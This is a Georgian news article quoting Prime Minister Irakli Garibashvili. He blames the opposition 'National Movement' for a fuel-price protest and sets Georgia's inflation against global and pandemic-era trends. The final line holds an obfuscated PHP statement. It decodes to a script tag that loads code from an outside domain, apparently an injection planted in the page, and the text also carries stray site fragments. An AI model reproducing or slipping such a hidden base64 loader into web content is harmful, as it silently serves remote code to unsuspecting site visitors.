celsiusi
ავერსი საქკაბელი
პრემიერ-მინისტრ ირაკლი ღარიბაშვილის განცხადებით, საწვავის ფასის ზრდასთან დაკავშირებით გუშინ გამართული საპროტესტო აქცია „ნაციონალური მოძრაობის“ მიერ იყო ორგანიზებული.
 
როგორც მან მთავრობის სხდომაზე აღნიშნა, ხელისუფლების ოპონენტები ცდილობენ, რომ მოქალაქეები საწვავის ფასების და ინფლაციის საკითხზე შეცდომაში შეიყვანონ.
 
„მინდა შევეხო საკითხს, რომელიც საწვავის ფასებს უკავშირდება. გუშინ ჩვენ ვნახეთ, რომ გარკვეული აქციები იყო ორგანიზებული, რომლის უკან, პირდაპირ უნდა ითქვას, რომ „ნაციონალური მოძრაობა“ იდგა. მესმის, რომ ჩვენს მოქალაქეებს ძალიან აწუხებთ ფასები. ჩვენ ყველანი ვართ დაინტერესებული იმით, რომ რაც შეიძლება შევუმსუბუქოთ ჩვენს მოქალაქეებს გაზრდილი ფასები და ის წნეხი, რომელიც ამ კრიზისებიდან გამომდინარეობს.
 
ზოგადად, ინფლაციას როცა ვახსენებთ, მინდა მოქალაქეებს გავახსენო, რომ კოვიდ პანდემიით გამოწეული ეკონომიკური კრიზისის ფონზე, ინფლაციის მაჩვენებელმა არაერთ ქვეყანაში, არამხოლოდ პროგნოზირებულს გადააჭარბა, არამედ უმეტეს შემთხვევაში, ათწლეულების რეკორდულ დონეს მიაღწია. მაგალითად, აშშ-ში 40 წლის რეკორდული მაქსიმუმი დაფიქსირდა, გერმანიაში ინფლაცია არის ბოლო 29 წლის მაქსიმუმზე.
 
ჩვენს ქვეყანაში გამოწვევა არის ინფლაცია, როგორც ფასების ზრდა, ისევე როგორც მთელ მსოფლიოში. ბუნებრივია, საქართველო გამონაკლისი ვერ იქნება. გამორიცხულია, რომ გამონაკლისი იყოს იმიტომ, რომ პატარა ქვეყანა ვართ, პატარა ეკონომიკით და მიერთებული ვართ მსოფლიო ბაზარს. რაც აშშ-ში, ევროპაში ხდება, რა თქმა უნდა, ჩვენზეც აისახება. პანდემიამ თავდაყირა დააყენა მთელი მსოფლიო, ახლა დაემატა ეს ტრაგედია-ომი. მეორე მსოფლიო ომის შემდეგ ასეთი მასშტაბის ომი ევროპაში არ ყოფილა. ბუნებრივია, ამას გავლენა ექნება ყველასა და ყველაფერზე, ფასებზე, ეკონომიკაზე. ამიტომ, ამას კარგად გააზრება და ჩვენი მოქალაქეებისთვის კარგად ახსნა სჭირდება.
 
არ მინდა შედარება გავაკეთო წინა მთავრობასთან, მაგრამ ვინაიდან ოპონენტები ასე უპასუხისმგებლოდ საუბრობენ და ცდილობენ მოქალაქეები შეცდომაში შეიყვანონ, მინდა მათ შევახსენო, რომ მათ პერიოდში წლიური ინფლაცია მაგალითად, 2011 წლის მაისში 14.3% იყო“, - განაცხადა ღარიბაშვილმა.
851
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");